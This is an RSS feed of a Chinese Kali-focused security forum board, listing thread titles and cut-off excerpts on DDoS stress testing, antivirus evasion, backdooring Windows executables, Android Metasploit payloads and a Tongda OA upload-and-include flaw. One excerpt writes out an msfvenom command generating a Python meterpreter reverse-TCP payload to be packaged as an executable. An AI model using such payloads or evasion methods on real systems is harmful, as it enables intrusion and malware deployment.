<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
  <channel>
    <title>Kali笔记 - WAF交流</title>
    <link>https://office.bbskali.cn/forum-39-1.html</link>
    <description>Latest 20 threads of WAF交流</description>
    <copyright>Copyright(C) Kali笔记</copyright>
    <generator>Discuz! Board by Comsenz Inc.</generator>
    <lastBuildDate>Thu, 16 Apr 2026 14:50:40 +0000</lastBuildDate>
    <ttl>60</ttl>
    <image>
      <url>https://office.bbskali.cn/static/image/common/logo_88_31.gif</url>
      <title>Kali笔记</title>
      <link>https://office.bbskali.cn/</link>
    </image>
    <item>
      <title>web压力测试</title>
      <link>https://office.bbskali.cn/thread-2313-1-1.html</link>
      <description><![CDATA[[md]&gt;所谓压力测试通俗点来说就是`DDOS`测试。通过模拟大量的正常用户访问网站，使的网站cpu、内存等资源占用耗尽。让服务器脱机，而这一系列的测试让正常用户无法访问此网站，从而达到测试的目的。

![web.png](data/attachment/forum/202108/31/231035tnwxv7jmjvqnz99 ...]]></description>
      <category>WAF交流</category>
      <author>admin</author>
      <pubDate>Tue, 31 Aug 2021 15:10:48 +0000</pubDate>
    </item>
    <item>
      <title>渗透测试是99%的运气+1%的运气</title>
      <link>https://office.bbskali.cn/thread-2177-1-1.html</link>
      <description><![CDATA[[md]&gt; 那日，抽着我仅剩的半根华子。感叹着人生的冷暖和不易！看着日历这月马上就要结束了，工资是不是快发了呢？打工人真不容易啊~忽然手机响起了熟悉的短信铃声，难道是工资到账了。怀着激动的心情打开一个居然是某英语辅导班的招生广告，感叹自己单身十年如一日，什 ...]]></description>
      <category>WAF交流</category>
      <author>admin</author>
      <pubDate>Fri, 27 Nov 2020 00:33:16 +0000</pubDate>
    </item>
    <item>
      <title>通过MSF加载器绕过AV</title>
      <link>https://office.bbskali.cn/thread-2173-1-1.html</link>
      <description><![CDATA[[md]### 环境
* Dev C ++
* kali 2020
### 获取
![Dev C ++](data/attachment/forum/202011/18/032309vxnfmuuu7uumv7vm.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 \&quot;QQ鎴?浘20201118091149.jpg\&quot;)
新建一个 `Project` 命名为`Loader64` 并将文件另存为 `Loa ...]]></description>
      <category>WAF交流</category>
      <author>admin</author>
      <pubDate>Wed, 18 Nov 2020 03:32:36 +0000</pubDate>
    </item>
    <item>
      <title>我是如何通过反编译获取系统权限的</title>
      <link>https://office.bbskali.cn/thread-2106-1-1.html</link>
      <description><![CDATA[警告！本次渗透测试是经过授权测试，请勿非法尝试，造成后果自负！
前言：前不久小伙伴发来一个自己编写的软件，让我进行渗透测试。
首先对软件打开，进行初步的信息收集。





打开之后，发现是一个订单查询系统。
既然似乎订单查询系统，肯定是连接到数据库的。而我 ...]]></description>
      <category>WAF交流</category>
      <author>admin</author>
      <pubDate>Sun, 06 Sep 2020 15:36:05 +0000</pubDate>
    </item>
    <item>
      <title>短信接收平台</title>
      <link>https://office.bbskali.cn/thread-2095-1-1.html</link>
      <description><![CDATA[推荐师傅们一个很便利的短信接收平台

https://www.bfkdim.com/]]></description>
      <category>WAF交流</category>
      <author>小黄人</author>
      <pubDate>Fri, 07 Aug 2020 07:19:59 +0000</pubDate>
    </item>
    <item>
      <title>Metasploit免杀马</title>
      <link>https://office.bbskali.cn/thread-2044-1-1.html</link>
      <description><![CDATA[[md]## 利用 msfvenom 生成马

```
msfvenom -p python/meterpreter/reverse_tcp LHOST=监听IP LPORT=监听端口 -f raw -o bbskali.py
```

## 准备 python 脚本


```
from distutils.core import setup
import py2exe
setup(
name = \'Meter\',
description = \'Python-ba ..]]></description>
      <category>WAF交流</category>
      <author>libo</author>
      <pubDate>Fri, 29 May 2020 07:54:02 +0000</pubDate>
    </item>
    <item>
      <title>通达OA文件上传&amp;文件包含漏洞解析</title>
      <link>https://office.bbskali.cn/thread-2026-1-1.html</link>
      <description><![CDATA[[md]通达OA是由北京通达信科科技有限公司开发的一款办公系统，近日通达官方在其官网发布了安全提醒与更新程序，并披露有用户遭到测试。
测试者可在未授权的情况下可上传图片Shell文件，之后通过精心构造的请求进行文件包含，实现远程命令执行，且测试者无须登陆认证即可 ...]]></description>
      <category>WAF交流</category>
      <author>admin</author>
      <pubDate>Mon, 11 May 2020 03:00:38 +0000</pubDate>
    </item>
    <item>
      <title>shell免杀那些事</title>
      <link>https://office.bbskali.cn/thread-437-1-1.html</link>
      <description><![CDATA[一款Shell，如何才能防止被杀毒软件查杀呢？答案就是——免杀！自从Shell诞生的那一天起，被杀与免杀的较量就从来没有停止过，正所谓是\&quot;道高一尺、魔高一丈\&quot;，在杀毒软件技术更新的同时，Shell的免杀技术也在不断的前进着。

关于术马免杀的方法是五花八门：修改特征码 ...]]></description>
      <category>WAF交流</category>
      <author>admin</author>
      <pubDate>Sat, 19 May 2018 05:29:21 +0000</pubDate>
    </item>
    <item>
      <title>METASPLOIT之安卓渗透之旅</title>
      <link>https://office.bbskali.cn/thread-411-1-1.html</link>
      <description><![CDATA[Metasploit之安卓渗透之旅 
首先打开vm启动Kali linux。接着打开终端，使用msfvenom制作android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。 
一旦打开终端提示 ...]]></description>
      <category>WAF交流</category>
      <author>libo</author>
      <pubDate>Mon, 14 May 2018 02:15:54 +0000</pubDate>
    </item>
    <item>
      <title>backdoor-factory patch注入绕过</title>
      <link>https://office.bbskali.cn/thread-392-1-1.html</link>
      <description><![CDATA[backdoor-factory 看其名知其意，直译过来就是后门工厂的意思。利用其 patch 方式的编码加密技术，可以轻松的生成win32PE后门程序，从而帮助我们绕过一些防病毒软件的查杀，达到一定得免杀效果！下面，我们来看看如何在 kali 上使用它。kali2.0 内已经集成了该款软件， ...]]></description>
      <category>WAF交流</category>
      <author>libo</author>
      <pubDate>Fri, 11 May 2018 17:31:56 +0000</pubDate>
    </item>
    <item>
      <title>基于MetaSploit内网穿透渗透测试</title>
      <link>https://office.bbskali.cn/thread-388-1-1.html</link>
      <description><![CDATA[本文分成三个模块
利用natapp进行内网穿透首先需要下载一个工具用于内网穿透(https://natapp.cn/)，内网穿透主要是利用远程服务器将tcp连接转发到自己的电脑上。这样子就可以实现不同网段内计算机进行tcp连接。我使用natapp工具进行内网穿透，注册并且免费获得自己的隧 ...]]></description>
      <category>WAF交流</category>
      <author>admin</author>
      <pubDate>Fri, 11 May 2018 02:34:19 +0000</pubDate>
    </item>
    <item>
      <title>来自BlackHat的新姿势：Process Doppelg&#228;nging攻击技术与贴身防护</title>
      <link>https://office.bbskali.cn/thread-237-1-1.html</link>
      <description><![CDATA[简述2017欧洲黑帽大会（Blackhat EUROPE 2017）上，网络安全公司enSilo两名研究人员介绍了一种名为“Process Doppelg&amp;#228;nging”的新型攻击。该攻击技术可以针对windows vista以上所有版本平台发起攻击，甚至可绕过大多数现代主流安全软件的检查，执行恶意程此攻击技 ...]]></description>
      <category>WAF交流</category>
      <author>priess</author>
      <pubDate>Wed, 14 Mar 2018 02:29:48 +0000</pubDate>
    </item>
    <item>
      <title>测试</title>
      <link>https://office.bbskali.cn/thread-12-1-1.html</link>
      <description><![CDATA[测试]]></description>
      <category>WAF交流</category>
      <author>1050239781</author>
      <pubDate>Sat, 21 Oct 2017 03:58:54 +0000</pubDate>
    </item>
  </channel>
</rss>